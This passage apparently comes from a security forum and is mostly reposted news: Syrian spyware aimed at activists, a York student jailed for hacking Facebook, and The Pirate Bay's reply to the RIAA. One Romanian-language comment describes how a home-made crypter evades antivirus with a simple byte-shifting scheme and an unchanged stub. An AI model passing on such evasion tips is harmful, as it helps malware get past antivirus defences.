smaller the region the virus is located in, the less likely virus vigilantes are to notice and combat it. "Looking at this Trojan and the telemetry that we've gathered the last five or six days since we did the analysis, this is not targeting people across the complete globe. So, it could be days before some antiviruses actually create signatures for the file," Thakur said. More complex antivirus software can detect malware that does not yet have a signature, because of how it behaves after infecting the computer, Thakur said. If the antivirus does not have this 'behavior' component, it may not defend against a new virus "for a substantial amount of time." On a Facebook page named "Cyber Arabs," Othman warns activists of the danger of downloading the virus and reminds users to keep their antivirus software updated. Download.com, CNET's software download website, offers antivirus software, some of which includes a "behavior" component and is free of charge. But that is still no guarantee for not contracting a new Syrian cyberbug, "Susan" reminds. "It was up-to-date," she said. "The problem is that they sent me a ... file, and I was totally stupid -- like, it's an EXE file -- and I opened it." Sursa: Spyware Is Newest Weapon In Syrian Conflict ? Packet Storm
[h=1]York Facebook hacking student Glenn Mangham jailed[/h] 17 February 2012 Last updated at 19:44 GMT A software development student from York who hacked into Facebook has been jailed for eight months. Glenn Mangham, 26, had earlier admitted infiltrating the social networking website between April and May 2011. Mangham, of Cornlands Road, York, had shown search engine Yahoo how it could improve security and said he wanted to do the same for Facebook. Sentencing Mangham, Judge Alistair McCreath said his actions could have been "utterly disastrous" for Facebook. Alison Saunders, from the Crown Prosecution Service, described the case as "the most extensive and flagrant incidence of social media hacking to be brought before British courts". Prosecutor Sandip Patel rejected Mangham's claims, saying: "He acted with determination, undoubted ingenuity and it was sophisticated, it was calculating." Facebook spent $200,000 (£126,400) dealing with Mangham's crime, which triggered a "concerted, time-consuming and costly investigation" by the FBI and British law enforcement, Mr Patel said. Electronic footprint The prosecutor told Southwark Crown Court in London how Mangham had "unlawfully accessed and hacked into the social media website Facebook and its computers in April to May last year from his bedroom in Yorkshire". Mangham had ultimately stolen "invaluable" intellectual property, which he downloaded on to an external hard drive, said Mr Patel. Facebook discovered the infiltration during a system check even though the defendant deleted his electronic footprint to cover his tracks. Mr Mangham's defence lawyer Tom Ventham had said his client was an ethical hacker who had a "high moral stance" and Yahoo had "rewarded" him for pointing out its vulnerabilities previously. He added that when Mangham was arrested he made "copious" admissions to police about what he had done. Passing sentence, Judge Alistair McCreath told Mangham his actions were not harmless and had "real consequences and very serious potential consequences" for Facebook. 'Not harmless' "You and others who are tempted to act as you did really must understand how serious this is," he said. "The creation of that risk, the extent of that risk and the cost of putting it right mean at the end of it all I'm afraid a prison sentence is inevitable." Mr McCreath said while he acknowledged that Mangham had never intended to pass on any of the information he had gathered, nor did he intend to make any money from it, his activities were "not just a bit of harmless experimentation". "You accessed the very heart of the system of an international business of massive size, so this was not just fiddling about in the business records of some tiny business of no great importance," he said. A spokesperson for Facebook said they "applauded" the work of the police and Crown Prosecution Service in this case, "which did not involve any compromise of personal user data". They added: "We take any attempt to gain unauthorised access to our network very seriously, and we work closely with law enforcement authorities to ensure that offenders are brought to justice." Sursa: Gammarays Jailed For Hacking Facebook ? Packet Storm
Nu are legatura algoritmul de cryptare, antivirusii detecteaza incarcarea in memorie, sau in functie de alte aspecte unice ale executabilului (mai exact entrypoint-ul stubului, dimensiuni alea sectiunilor sau cine stie ce altceva). Eu pentru crypterul meu de 2 lei foloseam un algoritm stupid: se adauga 65 la fiecare byte. Daca are mai mult de 255, se scade 255. Ceva de genul, nici nu mai stiu exact, si functiona fara nicio problema, ca se modifica TOT in fisierul cryptat, dar nu se modifica NIMIC in stub.
Pirate Bay hits out at delusional recording industry The cartel must be stopped By Dave Neal Fri Feb 17 2012, 13:26 FILE SHARING WEB SITE The Pirate Bay has responded to criticisms from the Recording Industry Association of America (RIAA), painting the organisation as quite mad. The RIAA fired the first salvo in the war of words, as other battles are being waged online and in government, when it accused The Pirate Bay of being a dreadful copyright thief. The RIAA was commenting on the Pirate Bay's decision to upsticks and move to a Swedish .se web domain and accused it of being brazen, and "one of the worst of the worst". "A blatantly illegal file-sharing site, proud that it's an online bazaar of every conceivable U.S. copyrighted work, found criminally responsible by its own country's legal system and who has been ordered by courts in at least seven European countries to be blocked by ISPs, has publicly acknowledged changing its domain name to escape U.S. laws," wrote the RIAA in a blog post. "It is motivated by its brazen philosophy of thumbing its nose at the basic rights of America's creators. It is, in a phrase, one of the worst of the worst." A spokesman for The Pirate Bay has responded in a guest post at Torrentfreak. There a spokesman named "Winston" - with credit to George Orwell - said that this statement shows how detached and delusional the music industry has become. "The piece gives us ample information on just how delusional the recording industry really is, and shows why they must be stopped," said Winston in response to the post from Mitch Glazier, an impressively over-titled senior executive vice president at the RIAA. "In the very first sentence Glazier uses the phrase 'copyright theft'. It's an interesting concept - if anyone in history ever stole copyright, it must be the record industry... A small lesson to Mr Glazier: If someone steals something, you don't have it anymore. If you copy it, both have it. This means: If someone steals your copyright (aka 'copyright theft') you don't have the copyright anymore. I'm having a hard time to see that happening though, since copyright isn't really physical." Winston pokes fun at the RIAA, saying that it is out of date and relying on archaic arguments to shore up its cause. "Maybe (jobs lost to 'piracy') just aren't needed anymore! That's what technology does! Sorry, it's 2012 not 1912 - do you want to forbid robots as well, since they steal jobs?" he asks. Referring back to Glaziers comment about the web site being banned in a number of countries, and relating it to the recent European Court of Justice Sabam decision that outlawed monitoring and filtering content, he suggested that the RIAA might be supporting illegal activity. "And Mr. Glazier, talking about the countries in the EU that you have forced ISPs to block TPB (and other sites) is interesting, as the European Court has just decided that these types of censorship are just that - censorship, and should be treated as illegal," he added. "Could we see your view on the matter, as the RIAA is clearly supporting illegal censorship?" There is no love lost between the parties, of course, and while the RIAA suggests that it wants to work with the technology industry, The Pirate Bay will have nothing to do with it. "F*ck that. You're not in charge. If you want the help of the tech industry, ask for it. You'll probably get it since most tech people are nice. You're not in charge anymore and that's probably why you're pissed off," he said. "The recording industry is like a kid screaming for candy. The problem is that the kid has diabetes." µ